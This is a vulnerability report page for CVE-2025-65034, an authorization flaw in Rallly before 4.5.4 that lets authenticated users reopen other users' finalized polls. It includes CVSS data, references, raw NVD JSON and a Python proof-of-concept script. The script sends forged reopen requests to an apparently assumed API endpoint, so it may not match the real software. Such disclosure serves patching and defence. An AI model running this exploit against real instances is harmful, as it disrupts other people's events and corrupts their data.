Security Vulnerability Report
CVE-2025-65034 CVSS 8.1 HIGH

Published: 2025-11-19 18:15:51
Last Modified: 2025-11-24 18:02:45

Description

Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization vulnerability allows any authenticated user to reopen finalized polls belonging to other users by manipulating the pollId parameter. This can disrupt events managed by other users and compromise both availability and integrity of poll data. This issue has been patched in version 4.5.4.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:* - VULNERABLE
Rallly < 4.5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-65034 PoC - Rallly IDOR Vulnerability
# Description: Authenticated users can reopen finalized polls belonging to other users

TARGET_URL = "https://your-rallly-instance.com"
ATTACKER_TOKEN = "your-authentication-token"


def exploit_reopen_poll(target_poll_id):
    """
    Reopen any finalized poll by manipulating pollId parameter
    This exploits the IDOR vulnerability in Rallly < 4.5.4
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }

    # Step 1: Identify the poll you want to reopen (must be in finalized state)
    target_poll_id = target_poll_id

    # Step 2: Send request to reopen the poll (IDOR - no ownership check)
    reopen_endpoint = f"{TARGET_URL}/api/polls/{target_poll_id}/reopen"

    try:
        response = requests.post(reopen_endpoint, headers=headers, json={})
        if response.status_code == 200:
            print(f"[+] SUCCESS: Poll {target_poll_id} has been reopened!")
            print(f"[+] Response: {response.json()}")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except Exception as e:
        print(f"[-] ERROR: {str(e)}")
        return False


if __name__ == "__main__":
    # Example: Reopen a poll with known pollId
    victim_poll_id = "victim-poll-id-here"
    exploit_reopen_poll(victim_poll_id)
```

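References

https://github.com/lukevella/rallly/releases/tag/v4.5.4 (Release Notes)
https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc (Exploit, Vendor Advisory)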

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65034", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:51.300", "lastModified": "2025-11-24T18:02:45.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an improper authorization vulnerability allows any authenticated user to reopen finalized polls belonging to other users by manipulating the pollId parameter. This can disrupt events managed by other users and compromise both availability and integrity of poll data. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-5fp2-pv2j-rqpc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}